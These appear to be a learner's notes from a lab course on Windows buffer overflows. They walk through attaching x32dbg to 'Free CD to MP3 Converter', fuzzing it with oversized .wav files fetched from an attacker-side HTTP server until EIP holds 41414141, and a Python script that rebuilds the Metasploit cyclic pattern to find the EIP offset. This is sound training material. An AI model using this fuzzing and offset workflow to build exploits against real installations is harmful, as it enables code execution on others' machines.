PRACTICAL EXERCISES

DEBUGGING WINDOWS PROGRAMS

Try to RDP into the Windows VM using one of the methods mentioned above, and apply what you learned in this module. When you try to attach to 'Free CD to MP3 Converter', what is the name of its process?
root@htb:~$ xfreerdp /v:10.129.43.22 /u:htb-student /p:Academy_student!
PS C:\> Set-Location ~/Desktop
PS C:\> Get-ChildItem .
 Directory: C:\Users\htb-student\Desktop
  Mode                 LastWriteTime         Length Name
  -a----         4/26/2021   6:39 AM           2006 CloudMe.lnk
  -a----         9/27/2025   7:57 PM           1041 Free CD to MP3 Converter.lnk

PS C:\> & ".\Free CD to MP3 Converter.lnk"
 ...

 * the "&" is PowerShell's call operator: it tells PowerShell to "take the
   next token (string, variable, or scriptblock) and execute it as a
   command."
    - it is needed when the command to be run is stored in a string or its
      path contains spaces / special characters (as here, where the .lnk
      name contains spaces and has to be quoted).

PS C:\> .\x32dbg.lnk
X32DBG > File > Attach
 Program Name: Free CD to MP3 Converter
 
X32DBG > Attach
  PID=6356
  Name=cdextract
  Title=Free CD to MP3 Converter
  Path=C:\Program Files\CD to MP3 Freeware\cdextract.exe

FUZZING PARAMETERS

Try to fuzz the program with '.wav' files of increments of 1000 bytes '1000, 2000, 3000...', and find the smallest payload size that crashes the program and overwrites EIP with '41414141'.
 (RDP in, launch the converter and attach x32dbg to cdextract.exe exactly as in the previous exercise, then build the fuzz files)
root@htb:~$ for n in 1 2 3 4 5 6; do python3 -c "open('fuzz${n}k.wav', 'wb').write(b'A' * ${n}000)"; done

 * write() is used instead of print() so each file is exactly n*1000 bytes;
   print() appends a trailing newline, which would make every payload one
   byte larger than the size it is named after.

root@htb:~$ python3 -m http.server 8080
 ...
  
PS C:\> Invoke-WebRequest -Uri "http://10.10.14.46:8080/fuzz1k.wav" -OutFile fuzz1k.wav
PS C:\> Invoke-WebRequest -Uri "http://10.10.14.46:8080/fuzz2k.wav" -OutFile fuzz2k.wav
PS C:\> Invoke-WebRequest -Uri "http://10.10.14.46:8080/fuzz3k.wav" -OutFile fuzz3k.wav
PS C:\> Invoke-WebRequest -Uri "http://10.10.14.46:8080/fuzz4k.wav" -OutFile fuzz4k.wav
PS C:\> Invoke-WebRequest -Uri "http://10.10.14.46:8080/fuzz5k.wav" -OutFile fuzz5k.wav
PS C:\> Invoke-WebRequest -Uri "http://10.10.14.46:8080/fuzz6k.wav" -OutFile fuzz6k.wav
Free CD to MP3 Converter > File > Wav to Mp3
 Filename: fuzz1k.wav
 ...
 Filename: fuzz5k.wav
  x32dbg
   EIP: 41414141

CONTROLLING EIP

If you find the value 'B5eB' in EIP after sending your pattern, what would be the EIP offset?
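The offset lookup behind this question, as an added example that is not part of the original notes: it rebuilds the msf-pattern_create sequence (upper, lower, digit; digit varies fastest) and finds where a 4-byte EIP value sits in it. It assumes the value is given as the debugger displays it, either 8 hex digits or the same dword read as 4 ASCII characters, so it reverses the bytes to memory order because x86 is little-endian; the function names are mine.

```python
import itertools
import string


def pattern_create(length: int) -> str:
    """Rebuild the msf-pattern_create sequence: 3-char chunks of
    UPPER + lower + digit, with the digit varying fastest ("Aa0Aa1Aa2...").
    The full cycle is 26*26*10*3 = 20280 chars, after which it repeats."""
    sets = (string.ascii_uppercase, string.ascii_lowercase, string.digits)
    chunks = itertools.cycle("".join(t) for t in itertools.product(*sets))
    return "".join(itertools.islice(chunks, length // 3 + 1))[:length]


def eip_offset(pattern: str, eip: str, start: int = 0):
    """Offset of the pattern bytes that landed in EIP, or None if absent.

    `eip` is the register value as the debugger displays it: either 8 hex
    digits ("42356542") or that dword read as 4 ASCII chars ("B5eB").
    x86 is little-endian, so the displayed dword is the reverse of the
    byte order in the overflowed buffer; the lookup reverses it back.
    (Assumption: the 4-char form is the displayed dword, not raw memory.)"""
    if len(eip) == 8 and all(c in string.hexdigits for c in eip):
        register = bytes.fromhex(eip)
    elif len(eip) == 4:
        register = eip.encode("ascii")
    else:
        raise ValueError("expected 8 hex digits or 4 ASCII characters")
    needle = register[::-1].decode("ascii", errors="replace")
    idx = pattern.find(needle, start)
    return None if idx == -1 else idx


if __name__ == "__main__":
    pat = pattern_create(5000)          # same size as the crashing fuzz file
    print(eip_offset(pat, "B5eB"))      # -> 915 (memory order is "Be5B")
    print(eip_offset(pat, "42356542"))  # -> 915, same dword given as hex
```

If the value is not found, check the byte order first: a 4-char value that was copied from a memory dump rather than from the register is already in memory order and must not be reversed.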
